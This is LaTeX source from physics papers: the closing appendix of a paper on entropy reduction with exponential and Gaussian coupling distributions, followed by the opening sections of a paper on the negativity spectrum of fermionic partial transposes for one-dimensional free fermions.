$\alpha=1$ and panel (b) for $\alpha=0.5$ and hence smaller ratio
$J_\text{min}/J_\text{max}$.
\label{fig:expo}}
\end{figure}
The key difference between both parametrizations \eqref{eq:expo}
and \eqref{eq:gaus} is that due to the quadratic argument in \eqref{eq:gaus}
the large couplings in this parametrization are very close to each other,
in particular for increasing $N$. Hence, one can study whether this feature
is favorable of unfavorable for entropy reduction.
\begin{figure}[htb]
\centering
\includegraphics[width=0.49\columnwidth]{fig9a}
\includegraphics[width=0.48\columnwidth]{fig9b}
\caption{Residual entropy as function of the applied
magnetic field for various bath sizes $N$ for
the Gaussian distributed couplings given by \eqref{eq:gaus}; panel (a) for
$\alpha=1$ and panel (b) for $\alpha=0.5$ and hence smaller ratio
$J_\text{min}/J_\text{max}$.
\label{fig:gaus}}
\end{figure}
Additionally, the difference between $\alpha=0.5$ and $\alpha=1$ consists
in a different spread of the couplings. For $\alpha=1$, one has
$J_\text{min}/J_\text{max}=1/e$ in both parametrizations while one has
$J_\text{min}/J_\text{max}=1/\sqrt{e}$ for $\alpha=0.5$, i.e., the spread is
smaller.
Figure \ref{fig:expo} displays the results for the exponential parametrization
\eqref{eq:expo} while Fig.\ \ref{fig:gaus} depicts the results for the Gaussian
parametrization \eqref{eq:gaus}. Comparing both figures shows that the
precise distribution of the couplings does not matter much. Exponential and
Gaussian parametrization lead to very similar results. They also strongly ressemble
the results shown in Fig.\ 2a in the main text for a uniform
distribution of couplings. This is quite remarkable since the Gaussian
parametrization leads to couplings which are very close to each other
and to the maximum coupling. This effect does not appear to influence
the achievable entropy reduction.
The ratio $J_\text{min}/J_\text{max}$ between the smallest to the largest coupling
appears to have an impact. If it is closer to unity, here for
$\alpha=0.5$, the reduction of entropy works even better than
for smaller ratios.
\end{appendix}
| 2024-02-18T23:40:09.473Z | 2020-02-07T02:00:59.000Z | algebraic_stack_train_0000 | 1,492 | 9,759 |
|
proofpile-arXiv_065-7315 | \section*{Abstract}
A basic diagnostic of entanglement in mixed quantum states is known as the positive partial transpose (PT) criterion.
Such criterion is based on the observation that the spectrum of the partially transposed density matrix of an entangled state contains negative eigenvalues, in turn, used to define an entanglement measure called the logarithmic negativity.
Despite the great success of logarithmic negativity in characterizing bosonic many-body systems,
generalizing the operation of PT to fermionic systems remained a technical challenge until recently when a more natural definition of PT for fermions that accounts for the Fermi statistics has been put forward.
In this paper, we study the many-body spectrum of the reduced density matrix of two adjacent intervals for one-dimensional free fermions after applying the fermionic PT.
We show that in general there is a freedom in the definition of such operation which leads to two different definitions of PT: the resulting density matrix is Hermitian in one case, while it becomes pseudo-Hermitian in the other case.
Using the path-integral formalism, we analytically compute the leading order term of the moments in both cases and derive the distribution of the corresponding eigenvalues over the complex plane.
We further verify our analytical findings by checking them against numerical lattice calculations.
}
\newpage
\vspace{10pt}
\noindent\rule{\textwidth}{1pt}
\tableofcontents\thispagestyle{fancy}
\noindent\rule{\textwidth}{1pt}
\vspace{10pt}
\newpage
\section{Introduction}
Entanglement is an intrinsic property of quantum systems beyond classical physics.
Having efficient frameworks to compute entanglement between two parts of a system is essential not only for fundamental interests such as characterizing phases of matter~\cite{Amico_rev2008,ccd-09,l-15,WenChen_book} and spacetime physics~\cite{Rangamani_book} but also for application purposes such as identifying useful resources to implement quantum computing processes.
For a bipartite Hilbert space $\mathcal{H}_A\otimes\mathcal{H}_B$, it is easy to determine whether a pure state $\ket{\Psi}$ is entangled or not: a product state, i.e.~any state of the form $\ket{\Phi_A}\otimes \ket{\Phi_B}$, is unentangled (separable), while a superposition state $\ket{\Psi}=\sum_i \alpha_i \ket{\Phi_A^{(i)}}\otimes \ket{\Phi_B^{(i)}}$, where $\ket{\Phi_{A/B}^{(i)}}$ is a set of local orthogonal states, is entangled.
The amount of entanglement in a given state can be quantified by the entropy of information within either subsystem $A$ or $B$, in the form of the von Neumann entropy
\begin{align}\label{eq:vN_def}
S(\rho_A)= -\text{Tr} (\rho_A \ln \rho_A)= -\sum_i \alpha_i^2 \ln \alpha_i^2,
\end{align}
or
the R\'enyi entanglement entropies (REEs)
\begin{align}\label{eq:Rn_def}
{\cal R}_n(\rho_A)= \frac{1}{1-n} \ln \text{Tr} (\rho_A^n)= \frac{1}{1-n} \ln \sum_i \alpha_i^{2n},
\end{align}
where $\rho_A=\text{Tr}_B(\ket{\Psi}\bra{\Psi})=\sum_i \alpha_i^2 \ket{\Phi_A^{(i)}} \bra{\Phi_A^{(i)}}$ is the reduced density matrix acting on $\mathcal{H}_A$. Notice that $S(\rho_A)=S(\rho_B)$ and ${\cal R}_n(\rho_A)={\cal R}_n(\rho_B)$ and clearly, $S,{\cal R}_n\geq 0$ where the equality holds for a product state. For analytical calculations, $S$ is usually obtained from ${\cal R}_n$ via $S=\lim_{n\to 1}{\cal R}_n$.
It is well-known that eigenvalues of density matrices, i.e.~the entanglement spectrum, contains more information than merely the entanglement entropies.
The entanglement spectrum has been studied and utilized toward better understanding of the phases of matter
\cite{2006PhRvB..73x5115R, Li_Haldane,PhysRevLett.103.016801,PhysRevLett.104.130502,PhysRevLett.104.156404,PhysRevLett.104.180502,PhysRevLett.105.080501,PhysRevB.81.064439,PhysRevX.1.021014,PhysRevLett.107.157001,PhysRevB.83.115322,PhysRevB.83.245132,PhysRevLett.110.236801,PhysRevLett.108.196402,PhysRevB.86.014404,PhysRevLett.110.067208,PhysRevLett.111.090401,Bauer2014},
broken-symmetry phases
\cite{Metlitski2011,PhysRevLett.110.260403,Tubman2014,PhysRevB.88.144426,PhysRevLett.116.190401},
and more exotic phases such as many-body localized states~\cite{PhysRevLett.115.267206,PhysRevB.93.174202,PhysRevLett.117.160601}. In particular, in the context of conformal field theories (CFTs) in (1+1)d the distribution of eigenvalues was analytically derived~\cite{Lefevre2008}
and was shown to obey a universal scaling function which depends only on the central charge of the underlying CFT. The obtained scaling function for the distribution of the entanglement spectrum at criticality
was further substantiated numerically~\cite{Lauchli2013,pm-10}, especially for matrix product
state representation at critical points~\cite{PhysRevLett.102.255701,PhysRevB.78.024410,PhysRevB.86.075117}.
\iffalse
The leading order term in the entanglement entropy of many-body states can be used to distinguish them from one another, since it exhibits universal scaling behaviors as a function of system size.
For instance, in (1+1)d systems, entanglement entropies of gapped phases saturate
(i.e.~obey an area law)~\cite{Hastings,Plenio_rev2010}, while they increase logarithmically with system size
at critical points described by conformal field theories (CFTs)~\cite{HOLZHEY1994443,Vidal2003,Calabrese2004,Calabrese2009}, i.e., $S\propto \ln \ell$ where the coefficient is proportional to the central charge.
It turned out that the entanglement spectrum~\cite{Li_Haldane}, i.e.~the eigenvalues of $\rho_A$ or $\rho_B$, contains more information beyond $S(\rho_A)$ which is simply a single number. For example, in CFTs or topological order ...
Unlike pure states, characterizing
mixed states is rather difficult.
In short, the reason is that mixed states are described by density matrices and may contain a combination of the quantum entanglement and classical correlations. On the other hand, the mixed states are ubiquitous in physics, for example, when one studies open systems coupled to an environment or when one is interested in the entanglement between two subsystems in a larger system
(i.e., the tripartite entanglement in a pure state).
Given this, it is important to distinguish between classical mixing and quantum entanglement.
However, it is well-known that the usual bipartite von Neumann or R\'enyi entropies cannot exclusively capture the quantum entanglement.
\fi
It turned out that extending the above ideas to mixed states where the system is described by a density matrix $\rho$
is not as easy as it may seem. A product state $\rho=\rho_A\otimes \rho_B$ is similarly unentangled. However, a large class of states, called separable states, in the form of $\rho=\sum_i p_i \rho_A^{(i)} \otimes \rho_B^{(i)}$ with $p_i\geq 0$ are classically correlated and do not contain any amount of entanglement.
Hence, the fact that superposition implies entanglement in pure states does not simply generalize to the entanglement in mixed states.
The positive partial transpose (PPT)~\cite{Peres1996,Horodecki1996,Simon2000,PhysRevLett.86.3658,PhysRevLett.87.167904,Zyczkowski1,Zyczkowski2} is a test designed to diagnose separable states based on the fact that density matrices are positive semi-definite operators. The PT of a density matrix $\rho=\sum_i \rho_{ijkl} \ket{e_A^{(i)}, e_B^{(j)}} \bra{e_A^{(k)}, e_B^{(l)}}$ written in a local orthonormal basis $\{\ket{e_A^{(k)}}, \ket{e_B^{(j)}} \}$ is defined by exchanging the indices of subsystem $A$ (or $B$) as in
\begin{align} \label{eq:rTb}
\rho^{T_A}=\sum_i \rho_{ijkl} \ket{e_A^{(k)}, e_B^{(j)}} \bra{e_A^{(i)}, e_B^{(l)}}.
\end{align}
Note that $\rho^{T_A}$ is a Hermitian operator and the PPT test follows by checking whether or not $\rho^{T_A}$ contains any negative eigenvalue.
A separable state passes the PPT test, i.e.~all the eigenvalues of $\rho^{T_A}$ are non-negative, whereas an inseparable (i.e., entangled) state yields negative eigenvalues after PT\footnote{A technical point is that there exists a set of inseparable states which also pass the PPT test~\cite{Horodecki1997}. They are said to contain bound entanglement which cannot be used for quantum computing processes such as teleportation~\cite{Horodecki1998}. This issue is beyond the scope of our paper and we do not elaborate further here.}. Hence, the PPT criterion can be used to decide whether a given density matrix is separable or not.
Similar to the entropic measures of pure-state entanglement in (\ref{eq:vN_def}) and (\ref{eq:Rn_def}),
the (logarithmic) entanglement negativity associated with the spectrum of the partially transposed density matrix is defined as a candidate to quantify mixed-state entanglement~\cite{PlenioEisert1999,Vidal2002,Plenio2005},
\begin{align} \label{eq:neg}
{\cal N}(\rho) &= \frac{\norm{{\rho^{T_A}} }-1}{2}, \\
\label{eq:neg_def}
{\cal E}(\rho) &= \ln \norm{{\rho^{T_A}} },
\end{align}
where $\norm{A}= \text{Tr} \sqrt{A A^\dag}$ is the trace norm. When $A$ is Hermitian, the trace norm is simplified into the sum of the absolute value of the eigenvalues of $A$. Hence, the above quantities measure the \emph{negativity} of the eigenvalues of $\rho^{T_A}$.
It is also useful to define the moments of the PT (aka R\'enyi negativity) via
\begin{align} \label{eq:pathTR_b}
{\cal N}_n(\rho) =\ln \text{Tr} ({\rho^{T_A}} )^n,
\end{align}
where the logarithmic negativity is obtained from analytic continuation
\begin{align} \label{eq:anal_cont_b}
{\cal E}(\rho)= \lim_{n\to 1/2} {\cal N}_{2n}(\rho).
\end{align}
Note that for a pure state $\rho=\ket{\Psi}\bra{\Psi}$, we have ${\cal E}(\rho)={\cal R}_{1/2}(\rho_A)$ where $\rho_A$ is the reduced density matrix on $\mathcal{H}_A$.
The entanglement negativity has been used to characterize mixed states in various quantum systems such as in
harmonic oscillator chains~\cite{PhysRevA.66.042327,PhysRevLett.100.080502,PhysRevA.78.012335,Anders2008,PhysRevA.77.062102,PhysRevA.80.012325,Eisler_Neq,Sherman2016,dct-16}, quantum spin models
\cite{PhysRevA.80.010304,PhysRevLett.105.187204,PhysRevB.81.064429,PhysRevLett.109.066403,Ruggiero_1,PhysRevA.81.032311,PhysRevA.84.062307,Mbeng,Grover2018,java-2018}, (1+1)d conformal and integrable field theories~\cite{Calabrese2012,Calabrese2013,Calabrese_Ft2015,Ruggiero_2,Alba_spectrum,kpp-14,fournier-2015,bc-16}, topologically ordered phases of matter in (2+1)d~\cite{Wen2016_1,Wen2016_2,PhysRevA.88.042319,PhysRevA.88.042318,hc-18},
and in out-of-equilibrium situations \cite{ctc-14,ez-14,hb-15,ac-18b,wen-2015,gh-18},
as well as holographic theories~\cite{Rangamani2014,Chaturvedi_1,Chaturvedi_2,Chaturvedi2018,Malvimat,Kudlerflam} and variational states~\cite{Clabrese_network2013,Alba2013,PhysRevB.90.064401,Nobili2015}.
Moreover, the PT was used to construct topological invariants for symmetry protected topological (SPT) phases protected by anti-unitary symmetries~\cite{Pollmann_Turner2012,Shiozaki_Ryu2017,Shap_unoriented,Shiozaki_antiunitary} and there are experimental proposals to measure it
with cold atoms \cite{gbbs-17,csg-18}.
Unlike the entanglement spectrum which has been studied extensively, less is known about the spectrum of partially transposed density matrices in many-body systems. It is true that the PPT test which predates the entanglement spectrum is based on the eigenvalues of the PT, but the test only uses the sign of the eigenvalues. Therefore, studying the spectrum of the PT could be useful in characterizing quantum phases of matter. Furthermore, the fact that PT is applicable to extract entanglement at finite-temperature states and that the eigenvalues have a sign structure (positive/negative) may help unravel some new features beyond the entanglement spectrum. Recently, the distribution of eigenvalues of the PT, dubbed as \emph{the negativity spectrum}, was studied for CFTs in (1+1)d~\cite{Ruggiero_2}. It was found that the negativity spectrum is universal and depends only on the central charge of the CFT, similar to the entanglement spectrum, while the precise form of the spectrum depends on the sign of the eigenvalues. This dependence
is weak for bulk eigenvalues, whereas it is strong at the spectrum edges.
In this paper, we would like to study the negativity spectrum in fermionic systems.
The PT of fermionic density matrices however involves some subtleties due to the Fermi statistics (i.e., anti-commutation relation of fermion operators).
Initially, a procedure for the PT of fermions based on the fermion-boson mapping (Jordan-Wigner transformation) was proposed~\cite{Eisler2015} and was also used in the subsequent studies~\cite{Coser2015_1,Coser2016_1,Coser2016_2,PhysRevB.93.115148,PoYao2016,Herzog2016,Eisert2016}.
However, this definition turned out to cause certain inconsistencies within fermionic theories such as violating the additivity property and missing some entanglement in topological superconductors, and give rise to incorrect classification of time-reversal symmetric topological insulators and superconductors.
Additionally, according to this definition it is computationally hard to find the PT (and calculate the entanglement negativity) even for free fermions, since the PT of a fermionic Gaussian state is not Gaussian.
This motivates us to use another way of implementing a fermionic PT which was proposed recently by some of us in the context of time-reversal symmetric SPT phases of fermions~\cite{Shap_unoriented,Shiozaki_antiunitary,Shap_pTR}.
This definition does not suffer from the above issues and at the same time the associated entanglement quantity is an entanglement monotone~\cite{Shap_sep}.
From a practical standpoint, the latter definition has the merit that the partially transposed Gaussian state remains Gaussian and hence can be computed efficiently for free fermions. A detailed survey of differences between the two definitions of PT from both perspectives of quantum information and condensed matter theory (specifically, topological phases of fermions) is discussed in Refs.~\cite{Shap_pTR,Shap_sep}.
Before we get into details of the fermionic PT in the coming sections, let us finish this part with a summary of our main findings.
We study the distribution of the many-body eigenvalues $\lambda_i$ of the partially transposed reduced density matrix,
\begin{align} \label{eq:dist}
P(\lambda)=\sum_i \delta(\lambda-\lambda_i)
\end{align}
for one-dimensional free fermions.
As a lattice realization, we consider the hopping Hamiltonian on a chain
\begin{align} \label{eq:Dirac_latt}
\hat{H}=- \sum_{j} [t ( f_{j+1}^\dag f_j + \text{H.c.}) +\mu f_j^\dag f_j ],
\end{align}
where the fermion operators $f_j$ and $f_j^\dag$ obey the anti-commutation relation $\{f_i,{f_j}^\dag\}=f_i{f_j}^\dag +{f_j}^\dag f_i=\delta_{ij}$ and $\{f_i,f_j\}=\{{f_i}^\dag,{f_j}^\dag\}=0$.
Recall that using the regular (matrix) PT -- we will refer to it as the \emph{bosonic} PT --, which applies to generic systems where local operators commute, the obtained PT density matrix is a Hermitian operator and its eigenvalues are either negative or positive.
However, it turned out that for fermions a consistent definition of PT involves a phase factor as we exchange indices in (\ref{eq:rTb}) and in general one can define two types of PT operation.
As we will explain in detail, these two types correspond to the freedom of spacetime boundary condition for fermions associated with the fermion-number parity symmetry. We reserve ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$ to denote the fermionic PT which leads to anti-periodic (untwisted) and periodic (twisted) boundary conditions along fundamental cycles of the spacetime manifold, respectively.
We should note that ${\rho^{T_A}} $ is pseudo-Hermitian\footnote{A pseudo-Hermitian operator $H$ is defined by $\eta H^\dag \eta^{-1}=H$ with $\eta^2=1$ where $\eta$ is a unitary Hermitian operator satisfying $\eta^\dag\eta=\eta\eta^\dag=1$ and $\eta=\eta^\dag$. Essentially, pseudo-Hermiticity is a generalization of Hermiticity, in that it implies Hermiticity when $\eta=1$.} and may contain complex eigenvalues, while $\rho^{\widetilde{T}_A}$ is Hermitian and its eigenvalues are real. We use the spacetime path integral formulation to analytically calculate the negativity spectrum. In the case of $\rho^{\widetilde{T}_A}$, we obtain results very similar to those of previous CFT work~\cite{Ruggiero_2}, where the distribution of positive and negative eigenvalues are described by two universal functions.
In the case of ${\rho^{T_A}} $, we observe that the eigenvalues are complex but they have a pattern and fall on six branches in complex plane
with a \emph{quantized} complex phase of $\angle \lambda=2\pi n/6$. We show that the spectrum is reflection symmetric with respect to the real axis and the eigenvalue distributions are described by four universal functions along $\angle \lambda=0, \pm 2\pi/6, \pm 4\pi/6, \pi$ branches.
We further verify our findings by checking them against numerical lattice simulations.
The rest of our paper is organized as follows: in Section~\ref{sec:prelim} we provide a brief review of partial transpose for fermions, in Section~\ref{sec:spacetime} we discuss the spacetime path-integral formulation of the moments of partially transposed density matrices.
The spectrum of the {twisted} and {untwisted} partial transpose is analytically derived in Section~\ref{sec:negativity} for different geometries, where numerical checks with free fermions on the lattice are also provided.
We close our discussion by some concluding remarks in Section~\ref{sec:conclusions}.
In several appendices, we give further details of the analytical calculations
and make connections with other related concepts.
\section{Preliminary remarks}
\label{sec:prelim}
In this section, we review some basic materials which we use in the next sections:
the definition of PT for fermions, how to extract the distribution of the eigenvalues of an operator from its moments, and some properties of partially transposed Gaussian states.
\subsection{{Twisted} and {untwisted} partial transpose for fermions}
In this part, we briefly discuss some background materials on our definitions of PT for fermions. More details can be found in Refs.~\cite{Shap_pTR,Shap_sep}.
We consider a fermionic Fock space ${\cal H}$ generated by $N$ local fermionic modes $f_j$, $j=1,\cdots,N$.
The Hilbert space is spanned by $\ket{n_1,n_2,\cdots,n_N}$ which is a string of occupation numbers $n_j=0,1$. We define the Majorana (real) fermion operators in terms of canonical operators as
\begin{align}
c_{2j-1}:=f^{\dag}_j+f_j, \quad
c_{2j}:=i(f_j-f_j^{\dag}), \quad
j=1, \dots, N.
\label{eq:real_fermion}
\end{align}
These operators satisfy the commutation relation $\{c_j, c_k \} = 2 \delta_{jk}$ and generate a Clifford algebra. Any operator $X$ acting on $\mathcal{H}$ can be expressed in terms of a polynomial of $c_j$'s,
\begin{align}
X = \sum_{k=1}^{2N} \sum_{p_1<p_2 \cdots <p_k} X_{p_1 \cdots p_k} c_{p_1} \cdots c_{p_k},
\label{eq:op_expand}
\end{align}
where $X_{p_1 \dots p_k}$ are complex numbers and fully antisymmetric under permutations of $\{1, \dots, k\}$. A density matrix has an extra constraint, i.e., it commutes with the total fermion-number parity operator, $[\rho,(-1)^F]=0$ where $F=\sum_j f_j^\dag f_j$. This constraint entails that the Majorana operator expansion of $\rho$ only contains even number of Majorana operators, i.e., $k$ in the above expression is even.
To study the entanglement, we consider a bipartite Hilbert space $\mathcal{H}_A\otimes \mathcal{H}_B$ spanned by
$f_j$ with $j=1,\cdots,N_A$ in subsystem $A$ and $j=N_A+1,\cdots,N_A+N_B$ in subsystem $B$.
Then, a generic density matrix on $\mathcal{H}_A\otimes \mathcal{H}_B$ can be expanded in Majorana operators as
\begin{align} \label{eq:density_bipartite}
\rho = \sum_{k_1,k_2}^{k_1+k_2 = {\rm even}} \rho_{p_1 \cdots p_{k_1}, q_1 \cdots q_{k_2}} a_{p_1} \cdots a_{p_{k_1}} b_{q_1} \cdots b_{q_{k_2}},
\end{align}
where
$\{ a_j \}$ and $\{ b_j \}$ are Majorana operators acting on $\mathcal{H}^A$
and $\mathcal{H}^B$, respectively,
and the even fermion-number parity condition is indicated by the condition $k_1+k_2 = {\rm even}$.
Our definition of the PT for fermions is given by~\cite{Shap_pTR,Shiozaki_antiunitary}
\begin{align}
{\rho^{T_A}} := \sum_{k_1,k_2}^{k_1+k_2 = {\rm even}} \rho_{p_1 \cdots p_{k_1}, q_1 \cdots q_{k_2}} i^{k_1} a_{p_1} \cdots a_{p_{k_1}} b_{q_1} \cdots b_{q_{k_2}},
\label{eq:fermion_pt}
\end{align}
and similarly for $ \rho^{T_B}$. It is easy to see that the subsequent application of the PT with respect to the two subsystems leads to the full transpose $(\rho^{T_A})^{T_B}=\rho^{T}$, i.e.~reversing the order of Majorana fermion operators.
In addition, the definition (\ref{eq:fermion_pt}) implies that
\begin{align}
\label{eq:property1}
({\rho^{T_A}} )^\dag &=(-1)^{F_A} {\rho^{T_A}} (-1)^{F_A},\\
\label{eq:property2}
({\rho^{T_A}} )^{ T_A} &=(-1)^{F_A} \rho (-1)^{F_A},
\end{align}
where $(-1)^{F_A}$ is the fermion-number parity operator on $H_A$, i.e.~$F_A=\sum_{j\in A} f_j^\dag f_j$.
The first identity, namely the pseudo-Hermiticity, can be understood as a consequence of the fact that $({\rho^{T_A}} )^\dag$ is defined the same as (\ref{eq:fermion_pt}) by replacing $i^{k_1}$ with $(-i)^{k_1}$.
The second identity reflects the fact that the fermionic PT is related to the action of time-reversal operator of spinless fermions in the Euclidean spacetime~\cite{Shiozaki_antiunitary}.
We should note that the matrix resulting from the PT is not necessarily Hermitian and may have complex eigenvalues, although $\text{Tr}{\rho^{T_A}} =1$. The existence of complex eigenvalues is a crucial property which was used in the context of SPT invariants to show that the complex phase of $\text{Tr}(\rho{\rho^{T_A}} )$, which represents a partition function on a non-orientable spacetime manifold, is a topological invariant. For instance, $\text{Tr}(\rho{\rho^{T_A}} )=e^{i2\pi \nu/8}$ for time-reversal symmetric topological superconductors (class BDI) which implies the $\mathbb{Z}_8$ classification. (Here $\nu \in \mathbb{Z}_8$ is the topological invariant).
Nevertheless, we may still use Eq.~(\ref{eq:neg_def}) to define an analog of entanglement negativity for fermions and calculate the trace norm in terms of square root of the eigenvalues of the composite operator $\rho_\times=[({\rho^{T_A}} )^\dag {\rho^{T_A}} ]$, which is a Hermitian operator with real positive eigenvalues.
On the other hand, from Eq.~(\ref{eq:property1}) we realize that $\rho_\times= (\rho^{\widetilde{T}_A})^2$ where we introduce the \emph{twisted} PT by
\begin{align}
\rho^{\widetilde{T}_A} :={\rho^{T_A}} (-1)^{F_A}.
\end{align}
It is easy to see from Eq.~(\ref{eq:property1}) that this operator is Hermitian and then similar to the bosonic PT always contains real eigenvalues. It is worth noting that
\begin{align} \label{eq:property_t}
(\rho^{\widetilde{T}_A})^{\widetilde{T}_A}=\rho,
\end{align}
in contrast with the \emph{untwisted} PT (\ref{eq:property2}). As we will see shortly, this difference between ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$ in the operator formalism will show up as anti-periodic and periodic boundary conditions across the fundamental cycles of spacetime manifold in the path-integral formalism. The central result of our paper is to report analytical results for the spectrum of ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$.
\subsection{The moment problem}
In the replica approach to logarithmic negativity (\ref{eq:neg_def}) and negativity spectrum, one first has to calculate the moments of PT, aka R\'enyi negativity (RN),
\begin{align}
{\cal N}_n^{({\rm ns})} (\rho)=\ln \text{Tr} [({\rho^{T_A}} )^n], \qquad {\cal N}_n^{({\rm r})} (\rho)=\ln \text{Tr} [(\rho^{\widetilde{T}_A})^n],
\end{align}
which are fermionic counterparts of the bosonic definition in Eq.~(\ref{eq:pathTR_b}). The superscripts $(\textrm{ns})$ and $(\textrm{r})$ stand for Neveu-Schwarz and Ramond respectively (the reason for this will be clear from the path integral representation of such quantities, see Section \ref{sec:spacetime} below).
Thus, the analog of analytic continuation (\ref{eq:anal_cont_b}) to obtain the logarithmic negativity is
\begin{align} \label{eq:anal_cont_f}
{\cal E}(\rho)= \lim_{n\to 1/2} {\cal N}_{2n}^{({\rm r})}.
\end{align}
In the following, we review a general framework to analytically obtain the distribution of eigenvalues of density matrix (or its transpose) from the moments.
This method was originally used to derive the entanglement spectrum of (1+1)d CFTs~\cite{Lefevre2008}.
Suppose we have an operator ${\cal O}$ whose moments are of the form
\begin{align} \label{eq:Rmoment}
R_n := \text{Tr}[{\cal O}^n].
\end{align}
In terms of the eigenvalues of ${\cal O}$, $\{ \lambda_j \}$, we have $R_n=\sum_j \lambda_j^n = \int P(\lambda) \lambda^n d\lambda$, where $P(\lambda)$ is the associated distribution function (see Eq.~(\ref{eq:dist})). The goal is to find $P(\lambda)$ by making use of the specific form of $R_n$ in (\ref{eq:Rmoment}).
The essential idea is to compute the Stjilties transform
\begin{equation} \label{eq:Stjilties}
f (s) := \frac{1}{\pi} \sum_{n=1}^{\infty} R_n s^{-n}= \frac{1}{\pi} \int d\lambda \frac{\lambda P(\lambda)}{s-\lambda}.
\end{equation}
Assuming that the eigenvalues are real, the distribution function can be easily read off from the relation
\begin{equation} \label{eq:prob_s}
P (\lambda) = \frac{1}{\lambda} \lim_{\epsilon \to 0} \text{Im} f (\lambda- i \epsilon).
\end{equation}
In the following we are going to focus on the complementary cumulative distribution function or simply the tail distribution, being a very simple object to be accessed for numerical comparison
\begin{align}
n(\lambda)=\int_\lambda^{\lambda_\text{max}} d\lambda P(\lambda).
\end{align}
For specific types of operators such as the density matrices and their PT in (1+1)d CFTs, the moments can be cast in the form,
\begin{align} \label{eq:Rn_cft}
R_n= r_n \exp \left(- b n + \frac{a}{n} \right), \qquad \forall n,
\end{align}
where $a, b\in \mathbb{R}$, $b>0$ and $r_n$ are non-universal constant.
In such cases, the distribution function is found to be \cite{Ruggiero_1}
\begin{align}
\label{eq:Pdist}
P (\lambda; a, b) &=\left\{
\begin{array}{ll}
\frac{a \, \theta (e^{-b} - \lambda)}{\lambda \sqrt{a \ln (e^{-b}/\lambda)}} I_1 (2 \sqrt{a \ln (e^{-b}/\lambda)})
+ \delta(e^{-b}- \lambda), & a>0,\\
\frac{- |a| \, \theta (e^{-b} - \lambda)}{\lambda \sqrt{|a| \ln (e^{-b}/\lambda)}} J_1 (2 \sqrt{|a| \ln (e^{-b}/\lambda)}) + \delta(e^{-b}- \lambda) , & a<0,
\end{array}
\right.
\end{align}
and the corresponding tail distribution is given by
\begin{align}
\label{eq:Tdist}
n (\lambda; a, b) &=\left\{
\begin{array}{ll}
I_0 (2 \sqrt{a \ln (e^{-b}/\lambda)}) , & a>0,\\
J_0 (2 \sqrt{|a| \ln (e^{-b}/\lambda)}), & a<0,
\end{array}
\right.
\end{align}
where $J_\alpha(x)$ and $I_\alpha(x)$ are the regular Bessel functions and modified Bessel functions of the first kind, respectively.
Note that \eqref{eq:Pdist} and \eqref{eq:Tdist} are derived by ignoring the presence of the constants $r_n$ in \eqref{eq:Rn_cft}. This relies on the assumption that they do not change significantly upon varying $n$, i.e.,
$\lim_{n\to \infty} \frac{1}{n}\ln r_n<\infty$.
The very same assumption has been adopted for the entanglement and bosonic negativity spectrum in Refs.~\cite{Lefevre2008} and \cite{Ruggiero_2} where the derived distribution functions agree with the numerically obtained spectra.
\subsection{Partial transpose of Gaussian states}
Here, we discuss how to compute the spectrum of the PT of a Gaussian state from the corresponding covariance matrix.
The idea is similar to that of the entanglement spectrum, while there are some differences as the covariance matrix associated with the partially transposed density matrix may contain complex eigenvalues. Before we continue, let us summarize the structure of the many-body spectrum of ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$ for free fermions,
\begin{align}
\text{Spec}[{\rho^{T_A}} ]&: \left\{
\begin{array}{lll}
(\lambda_i,\lambda_i^\ast) & \text{Im}[\lambda_i] \neq 0, &\\
(\lambda_i,\lambda_i) & \text{Im}[\lambda_i] = 0, & \lambda_i<0, \\
\lambda_i & \text{Im}[\lambda_i] = 0, & \lambda_i>0, \\
\end{array}
\right.\\
\text{Spec}[\rho^{\widetilde{T}_A}]&:
\left\{
\begin{array}{ll}
(\lambda_i, \lambda_i) & \lambda_i<0,\\
\lambda_i & \lambda_i>0,\\
\end{array}
\right.
\end{align}
where repeating values mean two fold degeneracy.
We should note that the pseudo-Hermiticity of ${\rho^{T_A}} $ (\ref{eq:property1}) ensures that the complex-valued subset of many-body eigenvalues of ${\rho^{T_A}} $ appear in complex conjugate pairs. This property is general and applicable to any density matrix beyond free fermions. An immediate consequence of this property is that any moment of ${\rho^{T_A}} $ is guaranteed to be real-valued.
A Gaussian density matrix in the Majorana fermion basis (\ref{eq:real_fermion}) is defined by
\begin{align} \label{eq:rho_w}
\rho_\Omega= \frac{1}{{\cal Z}(\Omega)} \exp\left(\frac{1}{4} \sum_{j,k=1}^{2N} \Omega_{jk} c_j c_k \right),
\end{align}
where $\Omega$ is a pure imaginary antisymmetric matrix and
${\cal Z}(\Omega)=\pm \sqrt{\det \left( 2\cosh\frac{\Omega}{2}\right)}$
is the normalization constant. We should note that the spectrum of $\Omega$ is in the form of $\pm \omega_j,\ j=1,\dots,N$ and the $\pm$ sign ambiguity in ${\cal Z}(\Omega)$ is related to the square root of determinant where we need to choose one eigenvalue for every pair $\pm \omega_j$. The sign is fixed by the Pfaffian.
This density matrix can be uniquely characterized by its covariance matrix,
\begin{align}
\Gamma_{jk}=\frac{1}{2}\text{Tr}(\rho_\Omega [c_j,c_k]),
\end{align}
which is a $2N\times 2N$ matrix.
These two matrices are related by
\begin{align} \label{eq:Gamma_Omega}
\Gamma= \tanh\left(\frac{\Omega}{2} \right), \qquad e^\Omega=\frac{\mathbb{I}+\Gamma}{\mathbb{I}-\Gamma}.
\end{align}
Furthermore, one can consider a generic Gaussian operator which is also defined through Eq.~(\ref{eq:rho_w}), but without requiring that the spectrum is pure imaginary. An equivalent description in terms of the covariance matrix is also applicable for such operators. The only difference is that the eigenvalues do not need to be real.
Let us recall how R\'enyi entropies (\ref{eq:Rn_def}) are computed for Gaussian states.
The density matrix (\ref{eq:rho_w}) can be brought into a diagonal form $\rho_\Omega = {\cal Z}^{-1} \exp\left(\frac{i}{2} \sum_{n} \omega_n d_{2n} d_{2n-1} \right)$,
where $\omega_n$ is obtained from an orthogonal transformation of $\Omega$.
In terms of the eigenvalues of $\Gamma$, denoted by $\pm \nu_j$, we have
$\rho_\Omega = \prod_n (1+ i \nu_n d_{2n} d_{2n-1} )/2$,
leading to
\begin{align}
{\cal R}_n(\rho)=\frac{1}{1-n} \sum_{j=1}^N \ln \left[ \left(\frac{1-\nu_j}{2}\right)^n+\left(\frac{1+\nu_j}{2}\right)^n \right].
\end{align}
We consider a density matrix on a bipartite Hilbert space (\ref{eq:density_bipartite}) where the covariance matrix takes a block matrix form as
\begin{align}
\Gamma = \left( \begin{array}{cc}
\Gamma_{AA} & \Gamma_{AB} \\
\Gamma_{BA} & \Gamma_{BB}
\end{array} \right).
\end{align}
